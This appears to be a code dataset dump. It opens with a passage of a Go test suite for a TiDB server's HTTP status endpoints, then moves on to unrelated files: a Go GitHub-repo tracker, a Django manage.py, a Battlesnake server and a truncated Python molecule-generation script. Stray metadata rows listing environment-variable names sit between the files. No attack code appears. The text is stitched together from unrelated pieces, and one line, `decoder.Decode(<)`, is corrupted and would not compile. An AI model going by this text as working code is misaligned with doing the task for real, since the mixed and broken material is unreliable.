decoder := json.NewDecoder(resp.Body)
var data mvccKV
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(data.Value.Info.Lock, IsNil)
c.Assert(data.Value.Info.Writes, IsNil)
c.Assert(data.Value.Info.Values, IsNil)
}
func (ts *HTTPHandlerTestSuite) TestTiFlashReplica(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
defer func(originGC bool) {
if originGC {
ddl.EmulatorGCEnable()
} else {
ddl.EmulatorGCDisable()
}
}(ddl.IsEmulatorGCEnable())
// Disable emulator GC.
// Otherwise emulator GC will delete table record as soon as possible after execute drop table DDL.
ddl.EmulatorGCDisable()
gcTimeFormat := "20060102-15:04:05 -0700 MST"
timeBeforeDrop := time.Now().Add(0 - 48*60*60*time.Second).Format(gcTimeFormat)
safePointSQL := `INSERT HIGH_PRIORITY INTO mysql.tidb VALUES ('tikv_gc_safe_point', '%[1]s', ''),('tikv_gc_enable','true','')
ON DUPLICATE KEY
UPDATE variable_value = '%[1]s'`
// Set GC safe point and enable GC.
dbt.mustExec(fmt.Sprintf(safePointSQL, timeBeforeDrop))
resp, err := ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data []tableFlashReplicaInfo
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(len(data), Equals, 0)
dbt.mustExec("use tidb")
dbt.mustExec("alter table test set tiflash replica 2 location labels 'a','b';")
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(len(data), Equals, 1)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, false)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(`{"id":84,"region_count":3,"flash_region_count":3}`)))
c.Assert(err, IsNil)
c.Assert(resp, NotNil)
body, err := ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(string(body), Equals, "[schema:1146]Table which ID = 84 does not exist.")
t, err := ts.domain.InfoSchema().TableByName(model.NewCIStr("tidb"), model.NewCIStr("test"))
c.Assert(err, IsNil)
req := fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, t.Meta().ID)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
c.Assert(resp, NotNil)
body, err = ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(string(body), Equals, "")
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 1)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, true) // The status should be true now.
// Should not take effect.
dbt.mustExec("alter table test set tiflash replica 2 location labels 'a','b';")
checkFunc := func() {
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 1)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, true) // The status should be true now.
}
// Test for get dropped table tiflash replica info.
dbt.mustExec("drop table test")
checkFunc()
// Test unique table id replica info.
dbt.mustExec("flashback table test")
checkFunc()
dbt.mustExec("drop table test")
checkFunc()
dbt.mustExec("flashback table test")
checkFunc()
// Test for partition table.
dbt.mustExec("alter table pt set tiflash replica 2 location labels 'a','b';")
dbt.mustExec("alter table test set tiflash replica 0;")
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 3)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, false)
pid0 := data[0].ID
pid1 := data[1].ID
pid2 := data[2].ID
// Mock for partition 1 replica was available.
req = fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, pid1)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
resp.Body.Close()
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 3)
c.Assert(data[0].Available, Equals, false)
c.Assert(data[1].Available, Equals, true)
c.Assert(data[2].Available, Equals, false)
// Mock for partition 0,2 replica was available.
req = fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, pid0)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
resp.Body.Close()
req = fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, pid2)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
resp.Body.Close()
checkFunc = func() {
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 3)
c.Assert(data[0].Available, Equals, true)
c.Assert(data[1].Available, Equals, true)
c.Assert(data[2].Available, Equals, true)
}
// Test for get truncated table tiflash replica info.
dbt.mustExec("truncate table pt")
dbt.mustExec("alter table pt set tiflash replica 0;")
checkFunc()
}
func (ts *HTTPHandlerTestSuite) TestDecodeColumnValue(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
// column is a structure used for test
type column struct {
id int64
tp *types.FieldType
}
// Backfill columns.
c1 := &column{id: 1, tp: types.NewFieldType(mysql.TypeLonglong)}
c2 := &column{id: 2, tp: types.NewFieldType(mysql.TypeVarchar)}
c3 := &column{id: 3, tp: types.NewFieldType(mysql.TypeNewDecimal)}
c4 := &column{id: 4, tp: types.NewFieldType(mysql.TypeTimestamp)}
cols := []*column{c1, c2, c3, c4}
row := make([]types.Datum, len(cols))
row[0] = types.NewIntDatum(100)
row[1] = types.NewBytesDatum([]byte("abc"))
row[2] = types.NewDecimalDatum(types.NewDecFromInt(1))
row[3] = types.NewTimeDatum(types.NewTime(types.FromGoTime(time.Now()), mysql.TypeTimestamp, 6))
// Encode the row.
colIDs := make([]int64, 0, 3)
for _, col := range cols {
colIDs = append(colIDs, col.id)
}
rd := rowcodec.Encoder{Enable: true}
sc := &stmtctx.StatementContext{TimeZone: time.UTC}
bs, err := tablecodec.EncodeRow(sc, row, colIDs, nil, nil, &rd)
c.Assert(err, IsNil)
c.Assert(bs, NotNil)
bin := base64.StdEncoding.EncodeToString(bs)
unitTest := func(col *column) {
path := fmt.Sprintf("/tables/%d/%v/%d/%d?rowBin=%s", col.id, col.tp.Tp, col.tp.Flag, col.tp.Flen, bin)
resp, err := ts.fetchStatus(path)
c.Assert(err, IsNil, Commentf("url:%s", ts.statusURL(path)))
decoder := json.NewDecoder(resp.Body)
var data interface{}
err = decoder.Decode(&data)
c.Assert(err, IsNil, Commentf("url:%v\ndata%v", ts.statusURL(path), data))
colVal, err := types.DatumsToString([]types.Datum{row[col.id-1]}, false)
c.Assert(err, IsNil)
c.Assert(data, Equals, colVal, Commentf("url:%v", ts.statusURL(path)))
}
for _, col := range cols {
unitTest(col)
}
// Test bin has `+`.
// 2018-03-08 16:01:00.315313
bin = "CAIIyAEIBAIGYWJjCAYGAQCBCAgJsZ+TgISg1M8Z"
row[3] = types.NewTimeDatum(types.NewTime(types.FromGoTime(time.Date(2018, 3, 8, 16, 1, 0, 315313000, time.UTC)), mysql.TypeTimestamp, 6))
unitTest(cols[3])
// Test bin has `/`.
// 2018-03-08 02:44:46.409199
bin = "CAIIyAEIBAIGYWJjCAYGAQCBCAgJ7/yY8LKF1M8Z"
row[3] = types.NewTimeDatum(types.NewTime(types.FromGoTime(time.Date(2018, 3, 8, 2, 44, 46, 409199000, time.UTC)), mysql.TypeTimestamp, 6))
unitTest(cols[3])
}
func (ts *HTTPHandlerTestSuite) TestGetIndexMVCC(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
// tests for normal index key
resp, err := ts.fetchStatus("/mvcc/index/tidb/test/idx1/1?a=1&b=2")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/1?a=1&b=2")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
// tests for index key which includes null
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/3?a=3&b")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/3?a=3&b")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
// tests for index key which includes empty string
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/4?a=4&b=")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/3?a=4&b=")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
// tests for wrong key
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/5?a=5&b=1")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, false)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/5?a=5&b=1")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, false)
// tests for missing column value
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/1?a=1")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data1 mvccKV
err = decoder.Decode(&data1)
c.Assert(err, NotNil)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/1?a=1")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
var data2 mvccKV
err = decoder.Decode(&data2)
c.Assert(err, NotNil)
resp, err = ts.fetchStatus("/mvcc/index/tidb/pt(p2)/idx/666?a=666&b=def")
c.Assert(err, IsNil)
defer resp.Body.Close()
decodeKeyMvcc(resp.Body, c, true)
}
func (ts *HTTPHandlerTestSuite) TestGetSettings(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/settings")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var settings *config.Config
err = decoder.Decode(&settings)
c.Assert(err, IsNil)
c.Assert(settings, DeepEquals, config.GetGlobalConfig())
}
func (ts *HTTPHandlerTestSuite) TestGetSchema(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/schema")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var dbs []*model.DBInfo
err = decoder.Decode(&dbs)
c.Assert(err, IsNil)
expects := []string{"information_schema", "metrics_schema", "mysql", "performance_schema", "test", "tidb"}
names := make([]string, len(dbs))
for i, v := range dbs {
names[i] = v.Name.L
}
sort.Strings(names)
c.Assert(names, DeepEquals, expects)
resp, err = ts.fetchStatus("/schema?table_id=5")
c.Assert(err, IsNil)
var t *model.TableInfo
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&t)
c.Assert(err, IsNil)
c.Assert(t.Name.L, Equals, "user")
_, err = ts.fetchStatus("/schema?table_id=a")
c.Assert(err, IsNil)
_, err = ts.fetchStatus("/schema?table_id=1")
c.Assert(err, IsNil)
_, err = ts.fetchStatus("/schema?table_id=-1")
c.Assert(err, IsNil)
resp, err = ts.fetchStatus("/schema/tidb")
c.Assert(err, IsNil)
var lt []*model.TableInfo
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(<)
c.Assert(err, IsNil)
c.Assert(len(lt), Greater, 0)
_, err = ts.fetchStatus("/schema/abc")
c.Assert(err, IsNil)
resp, err = ts.fetchStatus("/schema/tidb/test")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&t)
c.Assert(err, IsNil)
c.Assert(t.Name.L, Equals, "test")
_, err = ts.fetchStatus("/schema/tidb/abc")
c.Assert(err, IsNil)
resp, err = ts.fetchStatus("/db-table/5")
c.Assert(err, IsNil)
var dbtbl *dbTableInfo
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&dbtbl)
c.Assert(err, IsNil)
c.Assert(dbtbl.TableInfo.Name.L, Equals, "user")
c.Assert(dbtbl.DBInfo.Name.L, Equals, "mysql")
se, err := session.CreateSession(ts.store.(kv.Storage))
c.Assert(err, IsNil)
c.Assert(dbtbl.SchemaVersion, Equals, domain.GetDomain(se.(sessionctx.Context)).InfoSchema().SchemaMetaVersion())
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("create database if not exists test;")
dbt.mustExec("use test;")
dbt.mustExec(` create table t1 (id int KEY)
partition by range (id) (
PARTITION p0 VALUES LESS THAN (3),
PARTITION p1 VALUES LESS THAN (5),
PARTITION p2 VALUES LESS THAN (7),
PARTITION p3 VALUES LESS THAN (9))`)
resp, err = ts.fetchStatus("/schema/test/t1")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&t)
c.Assert(err, IsNil)
c.Assert(t.Name.L, Equals, "t1")
resp, err = ts.fetchStatus(fmt.Sprintf("/db-table/%v", t.GetPartitionInfo().Definitions[0].ID))
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&dbtbl)
c.Assert(err, IsNil)
c.Assert(dbtbl.TableInfo.Name.L, Equals, "t1")
c.Assert(dbtbl.DBInfo.Name.L, Equals, "test")
c.Assert(dbtbl.TableInfo, DeepEquals, t)
}
func (ts *HTTPHandlerTestSuite) TestAllHistory(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
_, err := ts.fetchStatus("/ddl/history/?limit=3")
c.Assert(err, IsNil)
_, err = ts.fetchStatus("/ddl/history/?limit=-1")
c.Assert(err, IsNil)
resp, err := ts.fetchStatus("/ddl/history")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var jobs []*model.Job
s, _ := session.CreateSession(ts.server.newTikvHandlerTool().Store.(kv.Storage))
defer s.Close()
store := domain.GetDomain(s.(sessionctx.Context)).Store()
txn, _ := store.Begin()
txnMeta := meta.NewMeta(txn)
txnMeta.GetAllHistoryDDLJobs()
data, _ := txnMeta.GetAllHistoryDDLJobs()
err = decoder.Decode(&jobs)
c.Assert(err, IsNil)
c.Assert(jobs, DeepEquals, data)
}
func (ts *HTTPHandlerTestSuite) TestPostSettings(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
form := make(url.Values)
form.Set("log_level", "error")
form.Set("tidb_general_log", "1")
resp, err := ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(log.GetLevel(), Equals, log.ErrorLevel)
c.Assert(zaplog.GetLevel(), Equals, zap.ErrorLevel)
c.Assert(config.GetGlobalConfig().Log.Level, Equals, "error")
c.Assert(atomic.LoadUint32(&variable.ProcessGeneralLog), Equals, uint32(1))
form = make(url.Values)
form.Set("log_level", "fatal")
form.Set("tidb_general_log", "0")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(atomic.LoadUint32(&variable.ProcessGeneralLog), Equals, uint32(0))
c.Assert(log.GetLevel(), Equals, log.FatalLevel)
c.Assert(zaplog.GetLevel(), Equals, zap.FatalLevel)
c.Assert(config.GetGlobalConfig().Log.Level, Equals, "fatal")
form.Set("log_level", os.Getenv("log_level"))
// test ddl_slow_threshold
form = make(url.Values)
form.Set("ddl_slow_threshold", "200")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(atomic.LoadUint32(&variable.DDLSlowOprThreshold), Equals, uint32(200))
// test check_mb4_value_in_utf8
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("create database tidb_test;")
dbt.mustExec("use tidb_test;")
dbt.mustExec("drop table if exists t2;")
dbt.mustExec("create table t2(a varchar(100) charset utf8);")
form.Set("check_mb4_value_in_utf8", "1")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(config.GetGlobalConfig().CheckMb4ValueInUTF8, Equals, true)
txn1, err := dbt.db.Begin()
c.Assert(err, IsNil)
_, err = txn1.Exec("insert t2 values (unhex('F0A48BAE'));")
c.Assert(err, NotNil)
txn1.Commit()
// Disable CheckMb4ValueInUTF8.
form = make(url.Values)
form.Set("check_mb4_value_in_utf8", "0")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(config.GetGlobalConfig().CheckMb4ValueInUTF8, Equals, false)
dbt.mustExec("insert t2 values (unhex('f09f8c80'));")
}
func (ts *HTTPHandlerTestSuite) TestPprof(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
retryTime := 100
for retry := 0; retry < retryTime; retry++ {
resp, err := ts.fetchStatus("/debug/pprof/heap")
if err == nil {
ioutil.ReadAll(resp.Body)
resp.Body.Close()
return
}
time.Sleep(time.Millisecond * 10)
}
zaplog.Fatal("failed to get profile for %d retries in every 10 ms", zap.Int("retryTime", retryTime))
}
func (ts *HTTPHandlerTestSuite) TestServerInfo(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/info")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
decoder := json.NewDecoder(resp.Body)
info := serverInfo{}
err = decoder.Decode(&info)
c.Assert(err, IsNil)
cfg := config.GetGlobalConfig()
c.Assert(info.IsOwner, IsTrue)
c.Assert(info.IP, Equals, cfg.AdvertiseAddress)
c.Assert(info.StatusPort, Equals, cfg.Status.StatusPort)
c.Assert(info.Lease, Equals, cfg.Lease)
c.Assert(info.Version, Equals, mysql.ServerVersion)
c.Assert(info.GitHash, Equals, printer.TiDBGitHash)
store := ts.server.newTikvHandlerTool().Store.(kv.Storage)
do, err := session.GetDomain(store.(kv.Storage))
c.Assert(err, IsNil)
ddl := do.DDL()
c.Assert(info.ID, Equals, ddl.GetID())
}
func (ts *HTTPHandlerTestSuite) TestAllServerInfo(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/info/all")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
decoder := json.NewDecoder(resp.Body)
clusterInfo := clusterServerInfo{}
err = decoder.Decode(&clusterInfo)
c.Assert(err, IsNil)
c.Assert(clusterInfo.IsAllServerVersionConsistent, IsTrue)
c.Assert(clusterInfo.ServersNum, Equals, 1)
store := ts.server.newTikvHandlerTool().Store.(kv.Storage)
do, err := session.GetDomain(store.(kv.Storage))
c.Assert(err, IsNil)
ddl := do.DDL()
c.Assert(clusterInfo.OwnerID, Equals, ddl.GetID())
serverInfo, ok := clusterInfo.AllServersInfo[ddl.GetID()]
c.Assert(ok, Equals, true)
cfg := config.GetGlobalConfig()
c.Assert(serverInfo.IP, Equals, cfg.AdvertiseAddress)
c.Assert(serverInfo.StatusPort, Equals, cfg.Status.StatusPort)
c.Assert(serverInfo.Lease, Equals, cfg.Lease)
c.Assert(serverInfo.Version, Equals, mysql.ServerVersion)
c.Assert(serverInfo.GitHash, Equals, printer.TiDBGitHash)
c.Assert(serverInfo.ID, Equals, ddl.GetID())
}
func (ts *HTTPHandlerTestSuite) TestHotRegionInfo(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/regions/hot")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
}
func (ts *HTTPHandlerTestSuite) TestDebugZip(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/debug/zip?seconds=1")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err := httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
}
func (ts *HTTPHandlerTestSuite) TestCheckCN(c *C) {
s := &Server{cfg: &config.Config{Security: config.Security{ClusterVerifyCN: []string{"a ", "b", "c"}}}}
tlsConfig := &tls.Config{}
s.setCNChecker(tlsConfig)
c.Assert(tlsConfig.VerifyPeerCertificate, NotNil)
err := tlsConfig.VerifyPeerCertificate(nil, [][]*x509.Certificate{{{Subject: pkix.Name{CommonName: "a"}}}})
c.Assert(err, IsNil)
err = tlsConfig.VerifyPeerCertificate(nil, [][]*x509.Certificate{{{Subject: pkix.Name{CommonName: "b"}}}})
c.Assert(err, IsNil)
err = tlsConfig.VerifyPeerCertificate(nil, [][]*x509.Certificate{{{Subject: pkix.Name{CommonName: "d"}}}})
c.Assert(err, NotNil)
}
func (ts *HTTPHandlerTestSuite) TestZipInfoForSQL(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("use test")
dbt.mustExec("create table if not exists t (a int)")
urlValues := url.Values{
"sql": {"select * from t"},
"current_db": {"test"},
}
resp, err := ts.formStatus("/debug/sub-optimal-plan", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err := httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
resp, err = ts.formStatus("/debug/sub-optimal-plan?pprof_time=5&timeout=0", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err = httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
resp, err = ts.formStatus("/debug/sub-optimal-plan?pprof_time=5", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err = httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
resp, err = ts.formStatus("/debug/sub-optimal-plan?timeout=1", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err = httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
urlValues.Set("current_db", "non_exists_db")
resp, err = ts.formStatus("/debug/sub-optimal-plan", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusInternalServerError)
b, err = ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(string(b), Equals, "use database non_exists_db failed, err: [schema:1049]Unknown database 'non_exists_db'\n")
c.Assert(resp.Body.Close(), IsNil)
}
func (ts *HTTPHandlerTestSuite) TestFailpointHandler(c *C) {
defer ts.stopServer(c)
// start server without enabling failpoint integration
ts.startServer(c)
resp, err := ts.fetchStatus("/fail/")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusNotFound)
ts.stopServer(c)
// enable failpoint integration and start server
c.Assert(failpoint.Enable("github.com/pingcap/tidb/server/integrateFailpoint", "return"), IsNil)
ts.startServer(c)
resp, err = ts.fetchStatus("/fail/")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err := ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(strings.Contains(string(b), "github.com/pingcap/tidb/server/integrateFailpoint=return"), IsTrue)
c.Assert(resp.Body.Close(), IsNil)
}
|
[
"\"log_level\""
] |
[] |
[
"log_level"
] |
[]
|
["log_level"]
|
go
| 1 | 0 | |
data.go
|
package main
import (
"fmt"
"os"
"strconv"
"github.com/jhunt/go-db"
)
type RepoWatch struct {
Name string `json:"name"`
Value string `json:"value"`
}
func UpdateRepos(d db.DB, lst []RepoWatch) error {
var err error
include := make([]interface{}, 0)
err = d.Exec(`UPDATE repos SET included = 0`)
if err != nil {
return err
}
for _, watch := range lst {
id, err := strconv.ParseInt(watch.Name, 10, 0)
if err != nil {
return err
}
if watch.Value == "on" {
include = append(include, int(id))
err = d.Exec(`UPDATE repos SET included = 1 WHERE id = $1`, int(id))
if err != nil {
return err
}
}
}
return nil
}
func ReadRepos(d db.DB) ([]Repository, error) {
repos, err := d.Query(`SELECT id, org, name, included FROM repos`)
if err != nil {
return nil, err
}
defer repos.Close()
l := make([]Repository, 0)
for repos.Next() {
var (
id, incl int
org, name string
)
err = repos.Scan(&id, &org, &name, &incl)
if err != nil {
return nil, err
}
l = append(l, Repository{
ID: id,
Org: org,
Name: name,
Included: incl == 1,
})
}
return l, nil
}
func ReadInformation(d db.DB) (*Health, error) {
health := &Health{
Repos: make(map[string]Repository),
Ignore: os.Getenv("IGNORE"),
}
repos, err := d.Query(`SELECT id, org, name FROM repos WHERE included = 1`)
if err != nil {
return nil, err
}
defer repos.Close()
for repos.Next() {
var (
id int
org, name string
)
err = repos.Scan(&id, &org, &name)
if err != nil {
return nil, err
}
repo := Repository{
ID: id,
Org: org,
Name: name,
}
issues, err := d.Query(`SELECT id, title, reporter, assignees, created_at, updated_at FROM issues WHERE repo_id = $1`, id)
if err != nil {
return nil, err
}
defer issues.Close()
repo.Issues = make([]Issue, 0)
for issues.Next() {
var (
number int
title, reporter, assignees string
created, updated int
)
err = issues.Scan(&number, &title, &reporter, &assignees, &created, &updated)
if err != nil {
return nil, err
}
repo.Issues = append(repo.Issues, Issue{
Number: number,
Title: title,
URL: fmt.Sprintf("https://github.com/%s/%s/issues/%d", repo.Org, repo.Name, number),
Created: created,
Updated: updated,
Reporter: reporter,
Assignees: split(assignees),
})
}
pulls, err := d.Query(`SELECT id, title, reporter, assignees, created_at, updated_at FROM pulls WHERE repo_id = $1`, id)
if err != nil {
return nil, err
}
defer pulls.Close()
repo.PullRequests = make([]PullRequest, 0)
for pulls.Next() {
var (
number int
title, reporter, assignees string
created, updated int
)
err = pulls.Scan(&number, &title, &reporter, &assignees, &created, &updated)
if err != nil {
return nil, err
}
repo.PullRequests = append(repo.PullRequests, PullRequest{
Number: number,
Title: title,
URL: fmt.Sprintf("https://github.com/%s/%s/pull/%d", repo.Org, repo.Name, number),
Created: created,
Updated: updated,
Reporter: reporter,
Assignees: split(assignees),
})
}
health.Repos[fmt.Sprintf("%s/%s", repo.Org, repo.Name)] = repo
}
return health, nil
}
func DedupePullRequests(d db.DB) {
switch d.Driver {
case "postgres":
d.Exec(`DELETE FROM issues
USING pulls
WHERE issues.repo_id = pulls.repo_id
AND issues.id = pulls.id`)
case "sqlite3":
d.Exec(`DELETE FROM issues
WHERE EXISTS (
SELECT * FROM pulls
WHERE pulls.id = issues.id
)`)
}
}
|
[
"\"IGNORE\""
] |
[] |
[
"IGNORE"
] |
[]
|
["IGNORE"]
|
go
| 1 | 0 | |
manage.py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apifest.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
main.go
|
package main
import (
"os"
"log"
"net/http"
)
func main() {
port := os.Getenv("PORT")
if len(port) == 0 {
port = "8080"
}
http.HandleFunc("/", HandleIndex)
http.HandleFunc("/start", HandleStart)
http.HandleFunc("/move", HandleMove)
http.HandleFunc("/end", HandleEnd)
log.Printf("Starting Battlesnake Server at http://0.0.0.0:%s...\n", port)
log.Fatal(http.ListenAndServe(":"+port, nil))
}
|
[
"\"PORT\""
] |
[] |
[
"PORT"
] |
[]
|
["PORT"]
|
go
| 1 | 0 | |
gen_CARAE_con_logP_SAS_TPSA.py
|
from model.CARAE import ARAE
#from utils.utils import *
import numpy as np
import os, sys
import time
import tensorflow as tf
import collections
import copy
from six.moves import cPickle
#os.environ["CUDA_VISIBLE_DEVICES"] = ""
def convert_to_smiles(vector, char):
smiles=""
for i in vector:
smiles+=char[i]
return smiles
def cal_accuracy(S1, S2, length):
count = 0
for i in range(len(S1)):
if np.array_equal(S1[i][1:length[i]+1],S2[i][:length[i]]):
count+=1
return count
char_list= ["H","C","N","O","F","P","S","Cl","Br","I",
"n","c","o","s",
"1","2","3","4","5","6","7","8",
"(",")","[","]",
"-","=","#","/","\\","+","@","X","Y"]
